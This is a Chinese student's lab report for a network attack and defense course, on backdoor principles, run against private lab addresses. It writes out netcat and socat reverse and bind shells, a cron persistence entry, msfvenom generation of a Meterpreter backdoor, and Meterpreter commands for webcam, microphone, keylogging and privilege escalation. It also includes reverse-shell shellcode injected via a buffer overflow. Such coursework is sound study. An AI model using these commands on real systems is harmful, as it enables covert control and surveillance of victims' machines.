2019-2020-2 20175322周弋鸿《网络对抗技术》Exp2 后门原理与实践

目录

• 1.后门概念
• 2. 常用后门工具
  • 2.1 NC 或 netcat
  • 2.2 Meterpreter
• 3.后门启动
  • 3.1使用netcat获取主机操作Shell，cron启动
  • 3.2使用socat获取主机操作Shell, 任务计划启动
  • 3.3使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell
  • 3.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权
  • 3.5可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell
• 4.收获感想
• 5.问题回答

---

1.后门概念

• 后门就是不经过正常认证流程而访问系统的通道。

2. 常用后门工具

2.1 NC 或 netcat

• 又名nc,ncat
• http://nc110.sourceforge.net/
• http://netcat.sourceforge.net/

2.1.1 Win获得Linux Shell

• 在Windows下使用ipconfig查看本机IP
  

• 使用ncat.exe程序ncat.exe -l -p 5322打开监听，并检查windows和linux的连通性
  

  

• 在kali中反弹连接Windows，ncat 192.168.132.1 5322 -e /bin/sh，使用-e选项执行shell程序
  

• windows下获得一个linux shell，可运行任何指令，如ls
  

2.1.2 Linux获得Win Shell

• 在kali中先安装net-tools，然后才能使用使用ifconfig命令查看IP
  

• 打开监听nc -l -p 5322
  

• 在Windows中反弹连接kali，ncat.exe -e cmd.exe 192.168.132.138 5322
  

• kali成功获得Windows的命令提示
  

*2.1.3 Mac获取Win shell

*2.1.4 Win获取Mac Shell

*2.1.5 Mac获取Linux Shell

*2.1.6 Linux获取Mac Shell

2.1.7 Netcat扩展知识

使用nc传输数据

• Windows下监听5322端口，ncat.exe -l 5322
• kali反弹连接到Windows的5322端口，nc 192.168.132.1 5322
• 连接建立成功，双方可以相互传输数据
  

使用nc传输文件(将文件从kali传给Windows)

• Windows下监听5322端口，并把收到的数据保存到file1.out中，ncat.exe -l 5322 > file1.out
• kali 反弹连接到Windows的5322端口，nc 192.168.132.1 5322 < file1.in
• 连接建立成功，Windows可以收到kali发来的文件
  

2.2 Meterpreter

• 后门就是一个程序。
• 传统的理解是：有人编写一个后门程序，大家拿来用。
• 后来有一些牛人呢，就想编写一个平台能生成后门程序。这个平台呢，把后门的
  • 基本功能（基本的连接、执行指令），
  • 扩展功能（如搜集用户信息、安装服务等功能），
  • 编码模式，
  • 运行平台，
  • 以及运行参数
• 全都做成零件或可调整的参数。用的时候按需要组合，就可以生成一个可执行文件。
• 典型的平台就包括有：
  • intersect
  • Metaspolit的msfvenom指令
  • Veil-evasion
• 参数说明
  • -p 使用的payload，payload翻译为有效载荷，就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
  • -x 使用的可执行文件模板，payload(shellcode)就写入到这个可执行文件中。
  • -e 使用的编码器，用于对shellcode变形，为了免杀。
  • -i 编码器的迭代次数。如上即使用该编码器编码5次。
  • -b badchar是payload中需要去除的字符。
  • LHOST 是反弹回连的IP
  • LPORT 是回连的端口
  • -f 生成文件的类型
  • > 输出到哪个文件

3.后门启动

3.1使用netcat获取主机操作Shell，cron启动

• crontab -e指令增加一条定时任务，-e表示编辑。因为是第一次编辑，故提示选择编辑器，这里选择的是3

• 最后一行添加58 * * * * /bin/netcat 192.168.132.1 5322 -e /bin/sh，意思是在每个小时的第58分钟反向连接Windows主机的5322端口
  

• linux在58分钟时连接windows，这是一个反弹连接式后门，监听的windows连接后可获得shell
  

3.2使用socat获取主机操作Shell, 任务计划启动

• 右击我的电脑，点击管理

• 点击任务计划程序，再点击创建任务
  

• 填写任务名，新建一个触发器
  

• 新建操作，并在程序或脚本中选择socat.exe路径，添加参数一栏填写tcp-listen:5322 exec:cmd.exe,pty,stderr
  

• 创建好后显示任务准备就绪
  

• 到达21：25后，再次打开时，可以发现创建的任务正在运行
  

• 自行弹出一个cmd窗口
  

• 在kali中输入输入指令socat - tcp:192.168.132.1:5322，完成连接，获得windows shell
  

3.3使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

• linux使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exe生成后门程序
  

• windows使用ncat.exe -lv 5322 > backdoor5322.exe，查看连接状态
  

• linux使用nc 192.168.132.1 5322 < backdoor5322.exe传输后门程序，传输成功后windows会给出提示
  

• 传送接收文件成功
  

• linux使用msfconsole进入msf控制台，并键入以下命令:

使用监听模块，设置payload:use exploit/multi/handler
使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
linux的IP地址:set LHOST 192.168.132.138
使用相同的端口:set LPORT 5322
查看设置:show options

• 进入msf控制台后的界面:
  

• 输入指令后的界面:
  

• linux使用exploit开始监听，并在windows中运行后门程序，linux成功获得windows的shell
  

  

3.4使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

• 使用record_mic指令可以截获一段音频
  

• 使用webcam_snap指令可以使用摄像头进行拍照
  

• 使用keyscan_start指令记录下击键的过程，使用keyscan_dump指令读取击键记录
  

• 使用screenshot指令可以进行截屏
  

• 使用getuid指令查看当前用户，使用getsystem指令进行提权操作
  

3.5可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell

• 在Exploit DataBase中搜索linux/x86 - Reverse下载反弹连接的shellcode并提取其中的机器码:

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80

• linux使用echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化
  

• 使用如下命令使输出重定向>将perl生成的字符串存储到文件input_shellcode中:

perl -e 'print "A"x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode

• 打开一个终端使用(cat input_shellcode;cat) | ./pwn1注入这段攻击buf，再开另外一个终端使用ps -ef | grep pwn1找到pwn1的进程号，之后启动gdb使用attach调试，使用disassemble foo查看ret的地址,设置断点，然后在另外一个终端中按下回车，再在gdb输入c继续运行
  

  

• 使用info r esp查看栈顶指针所在的位置，并查看改地址存放的数据
  

存放的地址为0xffffd38c，计算出shellcode地址就是0xffffd38c+4，即0xffffd390

• 在一个终端中打开msf控制台开始监听

• 在另一个终端修改input_shellcode并使用cat input_shellcode;cat) | ./pwn1运行pwn1文件
  

• 另一个终端得到shell开始运行
  

4.收获感想

• 本次实验较为简单，但是比较好费时间。其中加分项可以借鉴之前实验一的操作流程，整个实验中没有太大的难点。通过本次实验，我了解了后门的基本原理，自己动手操作体验，感受到了后门的危害性，希望在日后的学习过程中能够学到更多知识。

5.问题回答

• (1)例举你能想到的一个后门进入到你系统中的可能方式？
  • 在非官方网站上下载应用程序，这些程序有可能会绑定某些可执行文件，从而留下后门。点击钓鱼网站的链接之后，可能会有可执行文件下载到电脑中，留下后门。
• (2)例举你知道的后门如何启动起来(win及linux)的方式？
  • Linux:Crontab定时启动；注入shellcode。
  • Windows:新建任务计划；修改注册表项，设置后门程序自启动；用户执行带后门的执行文件。
• (3)Meterpreter有哪些给你映像深刻的功能？
  • 通过后门控制被控主机的shell，可以获取目标主机的音频、摄像头、击键记录等功能。
• (4)如何发现自己有系统有没有被安装后门？
  • 使用安全软件，对系统进行定时检测，查杀恶意文件。
  • 使用任务管理器等系统软件查看后台是否有异常程序。